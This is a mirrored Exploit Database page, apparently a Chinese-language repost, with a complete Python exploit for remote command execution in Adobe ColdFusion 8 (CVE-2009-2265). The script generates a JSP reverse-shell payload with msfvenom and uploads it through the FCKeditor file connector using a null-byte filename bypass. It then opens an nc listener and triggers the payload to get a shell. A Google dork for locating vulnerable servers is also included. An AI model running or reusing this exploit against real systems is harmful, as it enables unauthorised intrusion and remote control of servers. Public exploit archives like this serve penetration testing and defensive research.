Adobe ColdFusion 8 – Remote Command Execution (RCE)

• Exploit Database
• 114 阅读

• 作者： Pergyz
  日期： 2021-06-24
• 类别：

  • webapps
  平台：

  • cfm
• 来源：https://www.exploit-db.com/exploits/50057/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122

  # Exploit Title: Adobe ColdFusion 8 - Remote Command Execution (RCE) # Google Dork: intext:"adobe coldfusion 8" # Date: 24/06/2021 # Exploit Author: Pergyz # Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html # Version: 8 # Tested on: Microsoft Windows Server 2008 R2 Standard # CVE : CVE-2009-2265   #!/usr/bin/python3   from multiprocessing import Process import io import mimetypes import os import urllib.request import uuid   class MultiPartForm:   def __init__(self): self.files = [] self.boundary = uuid.uuid4().hex.encode('utf-8') return   def get_content_type(self): return 'multipart/form-data; boundary={}'.format(self.boundary.decode('utf-8'))   def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read()   if mimetype is None: mimetype = (mimetypes.guess_type(filename)[0] or 'application/octet-stream')   self.files.append((fieldname, filename, mimetype, body)) return   @staticmethod def _attached_file(name, filename): return (f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n').encode('utf-8')   @staticmethod def _content_type(ct): return 'Content-Type: {}\r\n'.format(ct).encode('utf-8')   def __bytes__(self): buffer = io.BytesIO() boundary = b'--' + self.boundary + b'\r\n'   for f_name, filename, f_content_type, body in self.files: buffer.write(boundary) buffer.write(self._attached_file(f_name, filename)) buffer.write(self._content_type(f_content_type)) buffer.write(b'\r\n') buffer.write(body) buffer.write(b'\r\n')   buffer.write(b'--' + self.boundary + b'--\r\n') return buffer.getvalue()   def execute_payload(): print('\nExecuting the payload...') print(urllib.request.urlopen(f'http://{rhost}:{rport}/userfiles/file/{filename}.jsp').read().decode('utf-8'))   def listen_connection(): print('\nListening for connection...') os.system(f'nc -nlvp {lport}')   if __name__ == '__main__': # Define some information lhost = '10.10.16.4' lport = 4444 rhost = "10.10.10.11" rport = 8500 filename = uuid.uuid4().hex   # Generate a payload that connects back and spawns a command shell print("\nGenerating a payload...") os.system(f'msfvenom -p java/jsp_shell_reverse_tcp LHOST={lhost} LPORT={lport} -o {filename}.jsp')   # Encode the form data form = MultiPartForm() form.add_file('newfile', filename + '.txt', fileHandle=open(filename + '.jsp', 'rb')) data = bytes(form)   # Create a request request = urllib.request.Request(f'http://{rhost}:{rport}/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/{filename}.jsp%00', data=data) request.add_header('Content-type', form.get_content_type()) request.add_header('Content-length', len(data))   # Print the request print('\nPriting request...')   for name, value in request.header_items(): print(f'{name}: {value}')   print('\n' + request.data.decode('utf-8'))   # Send the request and print the response print('\nSending request and printing response...') print(urllib.request.urlopen(request).read().decode('utf-8'))   # Print some information print('\nPrinting some information for debugging...') print(f'lhost: {lhost}') print(f'lport: {lport}') print(f'rhost: {rhost}') print(f'rport: {rport}') print(f'payload: {filename}.jsp')   # Delete the payload print("\nDeleting the payload...") os.system(f'rm {filename}.jsp')   # Listen for connections and execute the payload p1 = Process(target=listen_connection) p1.start() p2 = Process(target=execute_payload) p2.start() p1.join() p2.join()